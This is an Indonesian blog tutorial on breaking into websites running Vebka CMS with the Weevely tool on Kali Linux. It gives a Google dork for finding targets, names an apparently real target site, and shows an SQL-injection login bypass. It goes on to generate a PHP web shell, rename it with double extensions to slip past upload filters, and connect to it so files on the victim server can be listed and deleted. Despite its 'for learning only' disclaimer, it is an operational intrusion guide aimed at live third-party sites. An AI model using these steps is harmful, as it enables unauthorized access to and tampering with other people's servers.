Breaking

Kamis, 31 Desember 2015

Cara :: Hack Website dengan Weevely di Kali Linux 2.0 Sana


 Mungkin sudah banyak para Master yang buat Tutorial Cara Hack Website dengan Weevely di Kali Linux 2.0 Sana, dan ini hanyalah pembelajaran semata, agar tau bagaimana sedikit kerentanan terhadap website maka akan fatal.. oke langsung aja 

ikuti Step by Step :

Step Pertama Tanam Backdoor
Step Kedua Eksekusi 

Step Pertama



sebelumnya banyak sekali cara atau teknik-teknik yang digunakan untuk menanam suatu backdoor atau shell, pada tutorial kali ini , kita menggunakan teknik VEBKA CMS SHELL UPLOAD ikuti step by stepnya
[Baca : Cara Setting IP Address agar menjadi static di Kali Linux 2.0 Sana}


+ Exploit Title : Vebka Cms shell upload
+ Exploit Author : Ashiyane Digital Security Team
+ Vendor Homepage : http://www[dot]vebka[dot]si/
+ Google Dork : "Urejanje strani" "Uporabniško ime" "/admin"
+ Date: 01 - 01 - 2016
+ Tested On : Kali Linux 2.0 Sana
+ Test Website : http://www[dot]klima-dolinar[dot]si/
|-| Halaman admin => /admin/
|-| username: '=' 'or'
|-| password: '=' 'or'
[Baca : Cara Menggunakan Proxychains di Kali LInux 2.0 [Sana]]
Masukkan dorknya -->  "Urejanje strani" "Uporabniško ime" "/admin"  Ke "CLICK HERE"

maka akan muncul tab baru dengan tampilan seperti ini :


  
Pilih websitemya, dengan perhatikan link yang ditampilkan ,
(contoh : http://www[dot]klima-dolinar[dot]si )

buka lalu tambahkan Halaman Admin yang tertera di atas [ /admin/ ] dibelakang blognya, maka tampilannya akan seperti ini :

Masukkan Username dan Password diatas [ '=' 'or' ]

Syla 

bim

bim

:D



kalau gagal terus saat masukin username dan passwordnya, cari website lain ... :) cemungut yaa kakak :v

Selanjutnya cari dan cari untuk kita tanam backdoor nanti, kalau untuk teknik ini, saat buat postingan baru ada untuk upload file, upload image, upload video, upload lemari juga bisa :v hahahahaha ....

berikut penampakkannya :)

untuk coba-coba, upload file berformat jpg atau php dulu, apa aja terserah
[Baca :FIXED error Failed to start metasploit.service: Unit metasploit.service failed to load: No such file or directory]
oke kita lanjut untuk buat backdoor dengan weevely ...

bagaimana cara membuat backdoor dengan weevely di kali linux 2.0 sana ? bagaimana cara menggunakan Weevely di Kali Linux 2.0 Sana ?

beginilah caranya ....

jeng

jeeng

jeeeenggg

wkwkwkwkwkwkw :v
Masukkan perintah berikut untuk melihat seluruh perintah di Weevely
[Baca : FIXED [!] ERROR: Can't find python.exe in /root/.wine/drive_c/Python27/ ]
root@sarzafi:~# weevely -h

masukkan perintah berikut untuk membuat backdoor :

root@sarzafi:~# weevely generate password /root/admin.php

apabila backdoor berhasil dibuat maka akan ada pemberitahuan seperti ini 

[Baca : FIXED wine: ‘/home/namauser/.wine’ is a 64-bit installation, it cannot be used with a 32-bit wineserver]


Generated backdoor with password 'password' in '/root/admin.php' of 1449 byte size.


root@sarzafi:~# weevely generate password /root/admin.php


[Baca : Bahaya Virus CrypToWall]
generate : untuk membuat backdoor

password : isikan disini passwordnya, saya gunakan 'password' untuk password saya



/root/admin.php : Ini direktory atau lokasi backdoor ingin diletakkan dimana, sedangkan admin.php : adalah nama file backdoor yang dibuat


setelah backdoor dibuat, maka upload pada website yang kita telah dapat tadi, biasanya untuk file php akan di tolak, maka rename lah filenya

misalnya nama filenya admin.php ubah jadi admin.php.jpg , lalu coba upload, kalau masih tidak bisa juga ubah jadi admin.php.jpg.php.jPg atau admin.PhP.jpg atau admin.PhP.jPg ubahlah sampai file bisa diupload

[Baca:CARA :: MELAPORKAN SITUS PROVOKATIF , PORNOGRAFI, TINDAK KEKERASAN, DAN PELECEHAN SEKSUAL]

setelah diupload, maka akan muncul nama file yang kita buat tadi, klik kanan pada link yang muncul lalu pilih Edit Link , seperti ini :


 maka akan muncul seperti ini
[Baca : Aplikasi Android Mendapatkan Dollar dari Android (NO HOAX)]
copy link tersebut ... dan paste di notepad atau gedit atau leafpad ...
dan kita lanjut ke step berikutnya

[Baca : Cara Mendapatkan Uang dari Aplikasi Android]

Step Kedua Eksekusi



Buka weevely

root@sarzafi:~# weevely

masukan perintah berikut :

root@sarzafi:~# weevely [Link yang tadi di copy] [passwordnya]

contoh

root@sarzafi:~# weevely http://www[dot]klima-dolinar[dot]si/userfiles/admin[dot]php.jpg[dot]php.jPg password

[/ jangan ikutin [dot] nya, itu hanya contoh /]

apabila pada terminal muncul seperti ini :

weevely>

maka masukkan lagi passwordnya

jeng jeng jeng jeeeeng :D sekarang website berada di terminal anda, terserah mau di apain, asal jangan ditebas indexnya  :)

setelah masuk yang tadinya   

root@sarzafi:~# menjadi server1.vebka.si:/var/www/clients/client1/web49/web/userfiles $

masukkan perintah :

ls = untuk menampilkan

remove [nama file] = untuk menghapus file :D sisanya coba-coba aja ya :)

berikut penampakkannya

  untuk melihat Bantuan pada Weevely masukkan perintah :
:help
berikut tanda bagi [ : ]





Hapus Backdoor orang laen :D hahaha
demikianlah Cara Hack Website dengan Weevely di Kali Linux 2.0 Sana

TUTORIAL INI HANYALAH PEMBELAJARAN SEMATA, BUKAN UNTUK BANGGA BANGGAN ATAU SOMBONG-SOMBONGAN DI SOSMED ... SEKIAN DAN TERIMA KASEEEHHHHHHH

semoga bermanfaat

Tidak ada komentar:

Posting Komentar

close